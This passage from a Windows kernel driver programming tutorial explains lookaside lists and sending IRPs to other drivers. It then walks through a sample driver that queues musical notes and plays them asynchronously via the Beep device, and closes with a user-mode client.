ULONG SomeData;
LIST_ENTRY SomeHead;
LOOKASIDE_LIST_EX Lookaside;
};
The driver creates an instance of that structure (maybe globally, or on a per-client basis). Let’s assume it’s
created dynamically for every client creating a file object to talk to a device the driver manages:
// if new is overloaded as described earlier in this chapter
MyData* pData = new (NonPagedPool) MyData;
// or with a standard allocation call
MyData* pData = (MyData*)ExAllocatePoolWithTag(NonPagedPool,
sizeof(MyData), DRIVER_TAG);
// initialize the lookaside list
ExInitializeLookasideListEx(&pData->Lookaside, MyAlloc, MyFree, ...);
In the allocation and free functions, we can get a pointer to our MyData object that contains whatever
lookaside list is being used at the time:
PVOID MyAlloc(POOL_TYPE type, SIZE_T size, ULONG tag,
PLOOKASIDE_LIST_EX lookaside) {
MyData* data = CONTAINING_RECORD(lookaside, MyData, Lookaside);
// access members
//...
}
This technique is useful if you have multiple lookaside lists, each with its own “context”
data. Obviously, if you just have one such list stored globally, you can simply access whatever global variables
you need.
Continuing with ExInitializeLookasideListEx: PoolType is the pool type to use; this is where the
driver selects which pool allocations should come from. Size, Tag and Depth have the same meaning as
they do in the classic API.
The Flags parameter can be zero, or one of the following:
• EX_LOOKASIDE_LIST_EX_FLAGS_RAISE_ON_FAIL - raise an exception instead of returning
NULL to the caller in case of an allocation failure.
• EX_LOOKASIDE_LIST_EX_FLAGS_FAIL_NO_RAISE - this flag can only be specified if a custom
allocation routine is specified. It causes the pool type provided to the allocation function to
be ORed with the POOL_QUOTA_FAIL_INSTEAD_OF_RAISE flag, which causes a call to
ExAllocatePoolWithQuotaTag to return NULL on a quota limit violation instead of raising an
exception. See the docs for more details.
The above flags are mutually exclusive.
Once the lookaside list is initialized, allocation and deallocation are done with the following APIs:
PVOID ExAllocateFromLookasideListEx (_Inout_ PLOOKASIDE_LIST_EX Lookaside);
VOID ExFreeToLookasideListEx (
_Inout_ PLOOKASIDE_LIST_EX Lookaside,
_In_ __drv_freesMem(Entry) PVOID Entry);
Of course, the terms “allocation” and “deallocation” are in the context of a lookaside list, meaning
allocations could be reused, and deallocations might return the block to the cache.
Finally, a lookaside list must be deleted with ExDeleteLookasideListEx:
VOID ExDeleteLookasideListEx (_Inout_ PLOOKASIDE_LIST_EX Lookaside);
Calling Other Drivers
One way to talk to other drivers is to be a “proper” client by calling ZwOpenFile or ZwCreateFile
in a similar manner to what a user-mode client does. Kernel callers have other options not available for
user-mode callers. One of the options is creating IRPs and sending them to a device object directly for
processing.
In most cases IRPs are created by one of the three managers, part of the Executive: I/O manager, Plug &
Play manager, and Power manager. In the cases we’ve seen so far, the I/O manager is the one creating
IRPs for create, close, read, write, and device I/O control request types. Drivers can create IRPs as well,
initialize them and then send them directly to another driver for processing. This could be more efficient
than opening a handle to the desired device, and then making calls using ZwReadFile, ZwWriteFile
and similar APIs we’ll look at in more detail in a later chapter. In some cases, opening a handle to a device
might not even be an option, but obtaining a device object pointer might still be possible.
The kernel provides a generic API for building IRPs, starting with IoAllocateIrp. Using this API
requires the driver to register a completion routine so the IRP can be properly freed. We'll examine these
techniques in a later chapter (“Advanced Programming Techniques (Part 2)”). In this section, I'll introduce
a simpler function to build a device I/O control IRP using IoBuildDeviceIoControlRequest:
PIRP IoBuildDeviceIoControlRequest(
	_In_      ULONG IoControlCode,
	_In_      PDEVICE_OBJECT DeviceObject,
	_In_opt_  PVOID InputBuffer,
	_In_      ULONG InputBufferLength,
	_Out_opt_ PVOID OutputBuffer,
	_In_      ULONG OutputBufferLength,
	_In_      BOOLEAN InternalDeviceIoControl,
	_In_opt_  PKEVENT Event,
	_Out_     PIO_STATUS_BLOCK IoStatusBlock);
The API returns a proper IRP pointer on success, including filling in the first IO_STACK_LOCATION, or
NULL on failure. Some of the parameters to IoBuildDeviceIoControlRequest are the same as those provided
to the DeviceIoControl user-mode API (or to its kernel equivalent, ZwDeviceIoControlFile):
IoControlCode, InputBuffer, InputBufferLength, OutputBuffer and OutputBufferLength.
The other parameters are the following:
• DeviceObject is the target device of this request. It’s needed so the API can allocate the correct
number of IO_STACK_LOCATION structures that accompany any IRP.
• InternalDeviceIoControl indicates whether the IRP should set its major function to IRP_MJ_INTERNAL_DEVICE_CONTROL (TRUE) or IRP_MJ_DEVICE_CONTROL (FALSE). This obviously depends
on the target device's expectations.
• Event is an optional pointer to an event object that gets signaled when the IRP is completed by the
target device (or some other device the target may send the IRP to). An event is needed if the IRP
is sent for synchronous processing, so that the caller can wait on the event if the operation has not
yet completed. We’ll see a complete example in the next section.
• IoStatusBlock returns the final status of the IRP (status and information), so the caller can examine
it if it so wishes.
The call to IoBuildDeviceIoControlRequest just builds the IRP - it is not sent anywhere at this
point. To actually send the IRP to a device, call the generic IoCallDriver API:
NTSTATUS IoCallDriver(
_In_ PDEVICE_OBJECT DeviceObject,
_Inout_ PIRP Irp);
IoCallDriver advances the current I/O stack location to the next, and then invokes the target driver’s
major function dispatch routine. It returns whatever is returned from that dispatch routine. Here is a very
simplified implementation:
NTSTATUS IoCallDriver(PDEVICE_OBJECT DeviceObject, PIRP Irp) {
// update the current layer index
DeviceObject->CurrentLocation--;
auto irpSp = IoGetNextIrpStackLocation(Irp);
// make the next stack location the current one
Irp->Tail.Overlay.CurrentStackLocation = irpSp;
// update device object
irpSp->DeviceObject = DeviceObject;
return (DeviceObject->DriverObject->MajorFunction[irpSp->MajorFunction])
(DeviceObject, Irp);
}
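Combining IoBuildDeviceIoControlRequest with IoCallDriver, a synchronous send might look roughly like the following sketch (IOCTL_SOME_DEVICE is a placeholder control code; the target device pointer and buffers are assumed to have been obtained already):

```cpp
// Sketch only: IOCTL_SOME_DEVICE, targetDevice and the buffers are placeholders
KEVENT event;
IO_STATUS_BLOCK ioStatus;
KeInitializeEvent(&event, NotificationEvent, FALSE);

PIRP irp = IoBuildDeviceIoControlRequest(IOCTL_SOME_DEVICE, targetDevice,
    inBuffer, inLen, outBuffer, outLen,
    FALSE,              // IRP_MJ_DEVICE_CONTROL (not internal)
    &event, &ioStatus);
if (irp == nullptr)
    return STATUS_INSUFFICIENT_RESOURCES;

NTSTATUS status = IoCallDriver(targetDevice, irp);
if (status == STATUS_PENDING) {
    // the target is completing asynchronously - wait for the event
    KeWaitForSingleObject(&event, Executive, KernelMode, FALSE, nullptr);
    status = ioStatus.Status;
}
// IRPs built this way are freed by the I/O manager upon completion
```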
The main remaining question is how to get a pointer to a device object in the first place. One way is
by calling IoGetDeviceObjectPointer:
NTSTATUS IoGetDeviceObjectPointer(
	_In_  PUNICODE_STRING ObjectName,
	_In_  ACCESS_MASK DesiredAccess,
	_Out_ PFILE_OBJECT *FileObject,
	_Out_ PDEVICE_OBJECT *DeviceObject);
The ObjectName parameter is the fully-qualified name of the device object in the Object Manager’s
namespace (as can be viewed with the WinObj tool from Sysinternals). Desired access is usually
FILE_READ_DATA, FILE_WRITE_DATA or FILE_ALL_ACCESS. Two values are returned on success: the
device object pointer (in DeviceObject) and an open file object pointing to the device object (in FileObject).
The file object is not usually needed, but it should be kept around as a means of keeping the device object
referenced. When you’re done with the device object, call ObDereferenceObject on the file object
pointer to decrement the device object’s reference count indirectly. Alternatively, you can increment the
device object’s reference count (ObReferenceObject) and then decrement the file object’s reference
count so you don’t have to keep it around.
The next section demonstrates usage of these APIs.
Putting it All Together: The Melody Driver
The Melody driver we’ll build in this section demonstrates many of the techniques shown in this chapter.
The melody driver allows playing sounds asynchronously (contrary to the Beep user-mode API that plays
sounds synchronously). A client application calls DeviceIoControl with a bunch of notes to play, and
the driver will play them as requested without blocking. Another sequence of notes can then be sent to
the driver, those notes queued to be played after the first sequence is finished.
It’s possible to come up with a user-mode solution that would do essentially the same thing, but this can
only be easily done in the context of a single process. A driver, on the other hand, can accept calls from
multiple processes, having a “global” ordering of playback. In any case, the point is to demonstrate driver
programming techniques, rather than managing a sound playing scenario.
We’ll start by creating an empty WDM driver, as we’ve done in previous chapters, named KMelody. Then
we’ll add a file named MelodyPublic.h to serve as the common data to the driver and a user-mode client.
This is where we define what a note looks like and an I/O control code for communication:
// MelodyPublic.h
#pragma once
#define MELODY_SYMLINK L"\\??\\KMelody"
struct Note {
ULONG Frequency;
ULONG Duration;
ULONG Delay{ 0 };
ULONG Repeat{ 1 };
};
#define MELODY_DEVICE 0x8003
#define IOCTL_MELODY_PLAY \
CTL_CODE(MELODY_DEVICE, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS)
A note consists of a frequency (in Hertz) and duration to play. To make it a bit more interesting, a delay
and repeat count are added. If Repeat is greater than one, the sound is played Repeat times, with a delay
of Delay between repeats. Duration and Delay are provided in milliseconds.
The architecture we’ll go for in the driver is to have a thread created when the first client opens a handle
to our device, and that thread will perform the playback based on a queue of notes the driver manages.
The thread will be shut down when the driver unloads.
It may seem asymmetric at this point - why not create the thread when the driver loads? As we shall
see shortly, there is a little “snag” that we have to deal with that prevents creating the thread when the
driver loads.
Let’s start with DriverEntry. It needs to create a device object and a symbolic link. Here is the full
function:
PlaybackState* g_State;
extern "C" NTSTATUS
DriverEntry(PDRIVER_OBJECT DriverObject, PUNICODE_STRING RegistryPath) {
UNREFERENCED_PARAMETER(RegistryPath);
g_State = new (PagedPool) PlaybackState;
if (g_State == nullptr)
return STATUS_INSUFFICIENT_RESOURCES;
auto status = STATUS_SUCCESS;
PDEVICE_OBJECT DeviceObject = nullptr;
UNICODE_STRING symLink = RTL_CONSTANT_STRING(L"\\??\\KMelody");
do {
UNICODE_STRING name = RTL_CONSTANT_STRING(L"\\Device\\KMelody");
status = IoCreateDevice(DriverObject, 0, &name, FILE_DEVICE_UNKNOWN,
0, FALSE, &DeviceObject);
if (!NT_SUCCESS(status))
break;
status = IoCreateSymbolicLink(&symLink, &name);
if (!NT_SUCCESS(status))
break;
} while (false);
if (!NT_SUCCESS(status)) {
KdPrint((DRIVER_PREFIX "Error (0x%08X)\n", status));
delete g_State;
if (DeviceObject)
IoDeleteDevice(DeviceObject);
return status;
}
DriverObject->DriverUnload = MelodyUnload;
DriverObject->MajorFunction[IRP_MJ_CREATE] =
DriverObject->MajorFunction[IRP_MJ_CLOSE] = MelodyCreateClose;
DriverObject->MajorFunction[IRP_MJ_DEVICE_CONTROL] = MelodyDeviceControl;
return status;
}
Most of the code should be familiar by now. The only new code is the creation of an object of type
PlaybackState. The new C++ operator is overloaded as described earlier in this chapter. If allocating a
PlaybackState instance fails, DriverEntry returns STATUS_INSUFFICIENT_RESOURCES, reporting a failure to the kernel.
The PlaybackState class is going to manage the list of notes to play and most other functionality specific
to the driver. Here is its declaration (in PlaybackState.h):
struct PlaybackState {
PlaybackState();
~PlaybackState();
NTSTATUS AddNotes(const Note* notes, ULONG count);
NTSTATUS Start(PVOID IoObject);
void Stop();
private:
static void PlayMelody(PVOID context);
void PlayMelody();
LIST_ENTRY m_head;
FastMutex m_lock;
PAGED_LOOKASIDE_LIST m_lookaside;
KSEMAPHORE m_counter;
KEVENT m_stopEvent;
HANDLE m_hThread{ nullptr };
};
m_head is the head of the linked list holding the notes to play. Since multiple threads can access
this list, it must be protected with a synchronization object. In this case, we’ll go with a fast mutex.
FastMutex is a wrapper class similar to the one we saw in chapter 6, with the added twist that it's
initialized in its constructor rather than in a separate Init method. This is convenient, and possible, because
PlaybackState is allocated dynamically, causing its constructor to be invoked, along with constructors
for data members (if any).
The note objects will be allocated from a lookaside list (m_lookaside), as each note has a fixed size, and
there is a strong likelihood of many notes coming and going. m_stopEvent is an event object that will
be used as a way to signal our playback thread to terminate. m_hThread is the playback thread handle.
Finally, m_counter is a semaphore that is going to be used in a somewhat counter-intuitive way, its
internal count indicating the number of notes in the queue.
As you can see, the event and semaphore don't have wrapper classes, so we need to initialize them in the
PlaybackState constructor. Here is the constructor in full (in PlaybackState.cpp), along with the definition
of the type that holds a single note:
struct FullNote : Note {
LIST_ENTRY Link;
};
PlaybackState::PlaybackState() {
InitializeListHead(&m_head);
KeInitializeSemaphore(&m_counter, 0, 1000);
KeInitializeEvent(&m_stopEvent, SynchronizationEvent, FALSE);
ExInitializePagedLookasideList(&m_lookaside, nullptr, nullptr, 0,
sizeof(FullNote), DRIVER_TAG, 0);
}
Here are the initialization steps taken by the constructor:
• Initialize the linked list to an empty list (InitializeListHead).
• Initialize the semaphore to a value of zero, meaning no notes are queued up at this point, with a
maximum of 1000 queued notes. Of course, this number is arbitrary.
• Initialize the stop event as a SynchronizationEvent type in the non-signaled state (KeInitializeEvent).
Technically, a NotificationEvent would have worked just as well, as just one thread will be
waiting on this event as we’ll see later.
• Initialize the lookaside list to manage paged pool allocations of size sizeof(FullNote).
FullNote extends Note to include a LIST_ENTRY member; otherwise we can't store such objects
in a linked list. The FullNote type should not be visible to user mode, which is why it's defined
privately in the driver's source files only.
DRIVER_TAG and DRIVER_PREFIX are defined in the file KMelody.h.
Before the driver finally unloads, the PlaybackState object is going to be destroyed, invoking its
destructor:
PlaybackState::~PlaybackState() {
Stop();
ExDeletePagedLookasideList(&m_lookaside);
}
The call to Stop signals the playback thread to terminate as we’ll see shortly. The only other thing left to
do in terms of cleanup is to free the lookaside list.
The unload routine for the driver is similar to ones we’ve seen before with the addition of freeing the
PlaybackState object:
void MelodyUnload(PDRIVER_OBJECT DriverObject) {
delete g_State;
UNICODE_STRING symLink = RTL_CONSTANT_STRING(L"\\??\\KMelody");
IoDeleteSymbolicLink(&symLink);
IoDeleteDevice(DriverObject->DeviceObject);
}
The IRP_MJ_DEVICE_CONTROL handler is where notes provided by a client need to be added to the queue
of notes to play. The implementation is pretty straightforward because the heavy lifting is performed by
the PlaybackState::AddNotes method. Here is MelodyDeviceControl that validates the client’s
data and then invokes AddNotes:
NTSTATUS MelodyDeviceControl(PDEVICE_OBJECT, PIRP Irp) {
auto irpSp = IoGetCurrentIrpStackLocation(Irp);
auto& dic = irpSp->Parameters.DeviceIoControl;
auto status = STATUS_INVALID_DEVICE_REQUEST;
ULONG info = 0;
switch (dic.IoControlCode) {
case IOCTL_MELODY_PLAY:
if (dic.InputBufferLength == 0 ||
dic.InputBufferLength % sizeof(Note) != 0) {
status = STATUS_INVALID_BUFFER_SIZE;
break;
}
auto data = (Note*)Irp->AssociatedIrp.SystemBuffer;
if (data == nullptr) {
status = STATUS_INVALID_PARAMETER;
break;
}
status = g_State->AddNotes(data,
dic.InputBufferLength / sizeof(Note));
if (!NT_SUCCESS(status))
break;
info = dic.InputBufferLength;
break;
}
return CompleteRequest(Irp, status, info);
}
CompleteRequest is a helper that we’ve seen before that completes the IRP with the given status and
information:
NTSTATUS CompleteRequest(PIRP Irp,
NTSTATUS status = STATUS_SUCCESS, ULONG_PTR info = 0);
//...
NTSTATUS CompleteRequest(PIRP Irp, NTSTATUS status, ULONG_PTR info) {
Irp->IoStatus.Status = status;
Irp->IoStatus.Information = info;
IoCompleteRequest(Irp, IO_NO_INCREMENT);
return status;
}
PlaybackState::AddNotes needs to iterate over the provided notes. Here is the beginning of the
function:
NTSTATUS PlaybackState::AddNotes(const Note* notes, ULONG count) {
KdPrint((DRIVER_PREFIX "State::AddNotes %u\n", count));
for (ULONG i = 0; i < count; i++) {
For each note, it needs to allocate a FullNote structure from the lookaside list:
auto fullNote = (FullNote*)ExAllocateFromPagedLookasideList(&m_lookaside);
if (fullNote == nullptr)
return STATUS_INSUFFICIENT_RESOURCES;
If successful, the note data is copied to the FullNote and added to the linked list under the protection
of the fast mutex:
//
// copy the data from the Note structure
//
memcpy(fullNote, &notes[i], sizeof(Note));
//
// insert into the linked list
//
Locker locker(m_lock);
InsertTailList(&m_head, &fullNote->Link);
}
Locker<T> is the same type we looked at in chapter 6. The notes are inserted at the back of the list
with InsertTailList. This is where we must provide a pointer to a LIST_ENTRY object, which is why
FullNote objects are used instead of just Note. Finally, when the loop completes, the semaphore must
be incremented by the number of notes, to indicate there are count more notes to play:
//
// make the semaphore signaled (if it wasn't already) to
// indicate there are new note(s) to play
//
KeReleaseSemaphore(&m_counter, 2, count, FALSE);
KdPrint((DRIVER_PREFIX "Semaphore count: %u\n",
KeReadStateSemaphore(&m_counter)));
The value 2 used in KeReleaseSemaphore is the temporary priority boost a driver can provide to a
thread that is released because of the semaphore becoming signaled (the same thing happens with the
second parameter to IoCompleteRequest). I’ve chosen the value 2 arbitrarily. The value 0 (IO_NO_-
INCREMENT) is fine as well.
For debugging purposes, it may be useful to read the semaphore’s count with KeReadStateSemaphore
as was done in the above code. Here is the full function (without the comments):
NTSTATUS PlaybackState::AddNotes(const Note* notes, ULONG count) {
KdPrint((DRIVER_PREFIX "State::AddNotes %u\n", count));
for (ULONG i = 0; i < count; i++) {
auto fullNote =
(FullNote*)ExAllocateFromPagedLookasideList(&m_lookaside);
if (fullNote == nullptr)
return STATUS_INSUFFICIENT_RESOURCES;
memcpy(fullNote, &notes[i], sizeof(Note));
Locker locker(m_lock);
InsertTailList(&m_head, &fullNote->Link);
}
KeReleaseSemaphore(&m_counter, 2, count, FALSE);
KdPrint((DRIVER_PREFIX "Semaphore count: %u\n",
KeReadStateSemaphore(&m_counter)));
return STATUS_SUCCESS;
}
The next part to look at is handling IRP_MJ_CREATE and IRP_MJ_CLOSE. In earlier chapters, we just
completed these IRPs successfully and that was it. This time, we need to create the playback thread when
the first client opens a handle to our device. The initialization in DriverEntry points both indices to
the same function, but the code is slightly different between the two. We could separate them to different
functions, but if the difference is not great we might decide to handle both within the same function.
For IRP_MJ_CLOSE, there is nothing to do but complete the IRP successfully. For IRP_MJ_CREATE, we
want to start the playback thread the first time the dispatch routine is invoked. Here is the code:
NTSTATUS MelodyCreateClose(PDEVICE_OBJECT DeviceObject, PIRP Irp) {
auto status = STATUS_SUCCESS;
if (IoGetCurrentIrpStackLocation(Irp)->MajorFunction == IRP_MJ_CREATE) {
//
// create the "playback" thread (if needed)
//
status = g_State->Start(DeviceObject);
}
return CompleteRequest(Irp, status);
}
The I/O stack location contains the IRP major function code we can use to make the distinction as required
here. In the Create case, we call PlaybackState::Start with the device object pointer that would be
used to keep the driver object alive as long as the thread is running. Let’s see what that method looks like.
NTSTATUS PlaybackState::Start(PVOID IoObject) {
	Locker locker(m_lock);
	if (m_hThread)
		return STATUS_SUCCESS;

	return IoCreateSystemThread(
		IoObject,            // driver or device object
		&m_hThread,          // resulting handle
		THREAD_ALL_ACCESS,   // access mask
		nullptr,             // no object attributes required
		NtCurrentProcess(),  // create in the current process
		nullptr,             // returned client ID
		PlayMelody,          // thread function
		this);               // passed to thread function
}
Acquiring the fast mutex ensures that a second thread is not created (as m_hThread would already be non-NULL). The thread is created with IoCreateSystemThread, which is preferred over PsCreateSystemThread because it ensures that the driver is not unloaded while the thread is executing (this does
require Windows 8 or later).
The passed-in I/O object is the device object provided by the IRP_MJ_CREATE handler. The most common
way of creating a thread by a driver is to run it in the context of the System process, as it normally should
not be tied to a user-mode process. Our case, however, is more complicated because we intend to use the
Beep driver to play the notes. The Beep driver needs to be able to handle multiple users (that might be
connected to the same system), each one playing their own sounds. This is why when asked to play a note,
the Beep driver plays in the context of the caller’s session. If we create the thread in the System process,
which is always part of session zero, we will not hear any sound, because session 0 is not an interactive
user session.
This means we need to create our thread in the context of some process running under the caller's session.
Using the caller's process directly (NtCurrentProcess) is the simplest way to get it working. You may
frown at this, and rightly so, because the first process calling the driver to play something is going to have
to host that thread for the lifetime of the driver. This has an unintended side effect: the process will not die.
Even if it may seem to terminate, it will still show up in Task Manager with our thread being the single
thread still keeping the process alive. We’ll find a more elegant solution later in this chapter.
Yet another consequence of this arrangement is that we only handle one session - the first one where one
of its processes happens to call the driver. We’ll fix that as well later on.
The created thread starts running the PlayMelody function - a static function in the PlaybackState
class. Callbacks must be global or static functions (because they are effectively C function pointers), but in
this case we would like to access the members of this instance of PlaybackState. The common trick
is to pass the this pointer as the thread argument, and have the callback simply invoke an instance method
using that pointer:
// static function
void PlaybackState::PlayMelody(PVOID context) {
((PlaybackState*)context)->PlayMelody();
}
Now the instance method PlaybackState::PlayMelody has full access to the object’s members.
There is another way to invoke the instance method without going through the intermediate
static by using C++ lambda functions, as non-capturing lambdas are directly convertible to C
function pointers:
IoCreateSystemThread(..., [](auto param) {
((PlaybackState*)param)->PlayMelody();
}, this);
The first order of business in the new thread is to obtain a pointer to the Beep device using IoGetDeviceObjectPointer:
#include <ntddbeep.h>
void PlaybackState::PlayMelody() {
PDEVICE_OBJECT beepDevice;
UNICODE_STRING beepDeviceName = RTL_CONSTANT_STRING(DD_BEEP_DEVICE_NAME_U);
PFILE_OBJECT beepFileObject;
auto status = IoGetDeviceObjectPointer(&beepDeviceName, GENERIC_WRITE,
&beepFileObject, &beepDevice);
if (!NT_SUCCESS(status)) {
KdPrint((DRIVER_PREFIX "Failed to locate beep device (0x%X)\n",
status));
return;
}
The Beep device name is \Device\Beep, as we've seen in chapter 2. Conveniently, the provided header
ntddbeep.h declares everything we need in order to work with the device, such as the DD_BEEP_DEVICE_NAME_U macro that defines the Unicode name.
At this point, the thread should loop around while it has notes to play and has not been instructed to
terminate. This is where the semaphore and the event come in. The thread must wait until one of them is
signaled. If it’s the event, it should break out of the loop. If it’s the semaphore, it means the semaphore’s
count is greater than zero, which in turn means the list of notes is not empty:
PVOID objects[] = { &m_counter, &m_stopEvent };
IO_STATUS_BLOCK ioStatus;
BEEP_SET_PARAMETERS params;
for (;;) {
status = KeWaitForMultipleObjects(2, objects, WaitAny, Executive,
KernelMode, FALSE, nullptr, nullptr);
if (status == STATUS_WAIT_1) {
KdPrint((DRIVER_PREFIX "Stop event signaled. Exiting thread...\n"));
break;
}
KdPrint((DRIVER_PREFIX "Semaphore count: %u\n",
KeReadStateSemaphore(&m_counter)));
The required call is to KeWaitForMultipleObjects with the event and semaphore. They are put in an
array, since this is the requirement for KeWaitForMultipleObjects. If the returned status is STATUS_WAIT_1
(which is the same as STATUS_WAIT_0 + 1), meaning index number 1 is the signaled object,
the loop is exited with a break instruction.
Now we need to extract the next note to play:
PLIST_ENTRY link;
{
Locker locker(m_lock);
link = RemoveHeadList(&m_head);
NT_ASSERT(link != &m_head);
}
auto note = CONTAINING_RECORD(link, FullNote, Link);
KdPrint((DRIVER_PREFIX "Playing note Freq: %u Dur: %u Rep: %u Delay: %u\n",
note->Frequency, note->Duration, note->Repeat, note->Delay));
We remove the head item from the list, doing so under the fast mutex's protection. The assert ensures
we are in a consistent state - remember that removing an item from an empty list returns a pointer to
the list head itself.
The actual FullNote pointer is retrieved with the help of the CONTAINING_RECORD macro, which moves
the LIST_ENTRY pointer we received from RemoveHeadList back to the containing FullNote that we are
actually interested in.
The next step is to handle the note. If the note's frequency is zero, we treat it as "silence time",
whose length is provided by the Duration member:
if (note->Frequency == 0) {
//
// just do a delay
//
NT_ASSERT(note->Duration > 0);
LARGE_INTEGER interval;
interval.QuadPart = -10000LL * note->Duration;
KeDelayExecutionThread(KernelMode, FALSE, &interval);
}
KeDelayExecutionThread is the rough equivalent of the Sleep/SleepEx APIs from user-mode. Here
is its declaration:
NTSTATUS KeDelayExecutionThread (
_In_ KPROCESSOR_MODE WaitMode,
_In_ BOOLEAN Alertable,
_In_ PLARGE_INTEGER Interval);
We’ve seen all these parameters as part of the wait functions. The most common invocation is with
KernelMode and FALSE for WaitMode and Alertable, respectively. The interval is the most important
parameter, where negative values mean relative wait in 100nsec units. Converting from milliseconds
means multiplying by -10000, which is what you see in the above code.
If the frequency in the note is not zero, then we need to call the Beep driver with proper IRP.
We already know that we need the IOCTL_BEEP_SET control code (defined in ntddbeep.h) and the
BEEP_SET_PARAMETERS structure. All we need to do is build an IRP with the correct information using
IoBuildDeviceIoControlRequest, and send it to the beep device with IoCallDriver:
else {
params.Duration = note->Duration;
params.Frequency = note->Frequency;
int count = max(1, note->Repeat);
KEVENT doneEvent;
KeInitializeEvent(&doneEvent, SynchronizationEvent, FALSE);
for (int i = 0; i < count; i++) {
auto irp = IoBuildDeviceIoControlRequest(IOCTL_BEEP_SET, beepDevice,
&params, sizeof(params),
nullptr, 0, FALSE, &doneEvent, &ioStatus);
if (!irp) {
KdPrint((DRIVER_PREFIX "Failed to allocate IRP\n"));
break;
}
status = IoCallDriver(beepDevice, irp);
if (!NT_SUCCESS(status)) {
KdPrint((DRIVER_PREFIX "Beep device playback error (0x%X)\n",
status));
break;
}
if (status == STATUS_PENDING) {
KeWaitForSingleObject(&doneEvent, Executive, KernelMode,
FALSE, nullptr);
}
We loop around based on the Repeat member (which is usually 1). Then the IRP_MJ_DEVICE_CONTROL
IRP is built with IoBuildDeviceIoControlRequest, supplying the frequency to play and the
duration. Then, IoCallDriver is invoked with the Beep device pointer we obtained earlier, and
the IRP. Unfortunately (or fortunately, depending on your perspective), the Beep driver just starts the
operation, but does not wait for it to finish. It might return (and in fact, always returns) STATUS_PENDING
from the IoCallDriver call, which means the operation is not yet complete (the actual playing has
not yet begun). Since we don’t have anything else to do until then, the doneEvent event provided to
IoBuildDeviceIoControlRequest is signaled automatically by the I/O manager when the operation
completes - so we wait on the event.
Now that the sound is playing, we have to wait for the duration of that note with KeDelayExecutionThread:
LARGE_INTEGER delay;
delay.QuadPart = -10000LL * note->Duration;
KeDelayExecutionThread(KernelMode, FALSE, &delay);
Finally, if Repeat is greater than one, then we might need to wait between plays of the same note:
// perform the delay if specified,
// except for the last iteration
//
if (i < count - 1 && note->Delay != 0) {
delay.QuadPart = -10000LL * note->Delay;
KeDelayExecutionThread(KernelMode, FALSE, &delay);
}
}
}
At this point, the note data can be freed (or just returned to the lookaside list) and the code loops back to
wait for the availability of the next note:
ExFreeToPagedLookasideList(&m_lookaside, note);
}
The loop continues until the thread is instructed to stop by signaling stopEvent, at which point it breaks
from the infinite loop and cleans up by dereferencing the file object obtained from IoGetDeviceObjectPointer:
ObDereferenceObject(beepFileObject);
}
Here is the entire thread function for convenience (comments and KdPrint removed):
void PlaybackState::PlayMelody() {
PDEVICE_OBJECT beepDevice;
UNICODE_STRING beepDeviceName = RTL_CONSTANT_STRING(DD_BEEP_DEVICE_NAME_U);
PFILE_OBJECT beepFileObject;
auto status = IoGetDeviceObjectPointer(&beepDeviceName, GENERIC_WRITE,
&beepFileObject, &beepDevice);
if (!NT_SUCCESS(status)) {
return;
}
PVOID objects[] = { &m_counter, &m_stopEvent };
IO_STATUS_BLOCK ioStatus;
BEEP_SET_PARAMETERS params;
for (;;) {
status = KeWaitForMultipleObjects(2, objects, WaitAny, Executive,
KernelMode, FALSE, nullptr, nullptr);
if (status == STATUS_WAIT_1) {
break;
}
PLIST_ENTRY link;
{
Locker locker(m_lock);
link = RemoveHeadList(&m_head);
NT_ASSERT(link != &m_head);
}
auto note = CONTAINING_RECORD(link, FullNote, Link);
if (note->Frequency == 0) {
NT_ASSERT(note->Duration > 0);
LARGE_INTEGER interval;
interval.QuadPart = -10000LL * note->Duration;
KeDelayExecutionThread(KernelMode, FALSE, &interval);
}
else {
params.Duration = note->Duration;
params.Frequency = note->Frequency;
int count = max(1, note->Repeat);
KEVENT doneEvent;
KeInitializeEvent(&doneEvent, SynchronizationEvent, FALSE);
for (int i = 0; i < count; i++) {
auto irp = IoBuildDeviceIoControlRequest(IOCTL_BEEP_SET,
beepDevice, &params, sizeof(params),
nullptr, 0, FALSE, &doneEvent, &ioStatus);
if (!irp) {
break;
}
NT_ASSERT(irp->UserEvent == &doneEvent);
status = IoCallDriver(beepDevice, irp);
if (!NT_SUCCESS(status)) {
break;
}
if (status == STATUS_PENDING) {
KeWaitForSingleObject(&doneEvent, Executive,
KernelMode, FALSE, nullptr);
}
LARGE_INTEGER delay;
delay.QuadPart = -10000LL * note->Duration;
KeDelayExecutionThread(KernelMode, FALSE, &delay);
if (i < count - 1 && note->Delay != 0) {
delay.QuadPart = -10000LL * note->Delay;
KeDelayExecutionThread(KernelMode, FALSE, &delay);
}
}
}
ExFreeToPagedLookasideList(&m_lookaside, note);
}
ObDereferenceObject(beepFileObject);
}
The last piece of the puzzle is the PlaybackState::Stop method that signals the thread to exit:
void PlaybackState::Stop() {
if (m_hThread) {
//
// signal the thread to stop
//
KeSetEvent(&m_stopEvent, 2, FALSE);
//
// wait for the thread to exit
//
PVOID thread;
auto status = ObReferenceObjectByHandle(m_hThread, SYNCHRONIZE,
*PsThreadType, KernelMode, &thread, nullptr);
if (!NT_SUCCESS(status)) {
KdPrint((DRIVER_PREFIX "ObReferenceObjectByHandle error (0x%X)\n",
status));
}
else {
KeWaitForSingleObject(thread, Executive, KernelMode, FALSE, nullptr);
ObDereferenceObject(thread);
}
ZwClose(m_hThread);
m_hThread = nullptr;
}
}
If the thread exists (m_hThread is non-NULL), then we set the event (KeSetEvent). Then we wait for
the thread to actually terminate. This is technically unnecessary because the thread was created with
IoCreateSystemThread, so there is no danger the driver is unloaded prematurely. Still, it’s worthwhile
showing how to get the pointer to the thread object given a handle (since KeWaitForSingleObject
requires an object). It’s important to remember to call ObDereferenceObject once we don’t need the
pointer anymore, or the thread object will remain alive forever (keeping its process and other resources
alive as well).
Client Code
Here are some examples for invoking the driver (error handling omitted):
#include <Windows.h>
#include <stdio.h>
#include "..\KMelody\MelodyPublic.h"
int main() {
HANDLE hDevice = CreateFile(MELODY_SYMLINK, GENERIC_WRITE, 0,
nullptr, OPEN_EXISTING, 0, nullptr);
Note notes[10];
for (int i = 0; i < _countof(notes); i++) {
notes[i].Frequency = 400 + i * 30;
notes[i].Duration = 500;
}
DWORD bytes;
DeviceIoControl(hDevice, IOCTL_MELODY_PLAY, notes, sizeof(notes),
nullptr, 0, &bytes, nullptr);
for (int i = 0; i < _countof(notes); i++) {
notes[i].Frequency = 1200 - i * 100;
notes[i].Duration = 300;
notes[i].Repeat = 2;
notes[i].Delay = 300;
}
DeviceIoControl(hDevice, IOCTL_MELODY_PLAY, notes, sizeof(notes),
nullptr, 0, &bytes, nullptr);
CloseHandle(hDevice);
return 0;
}
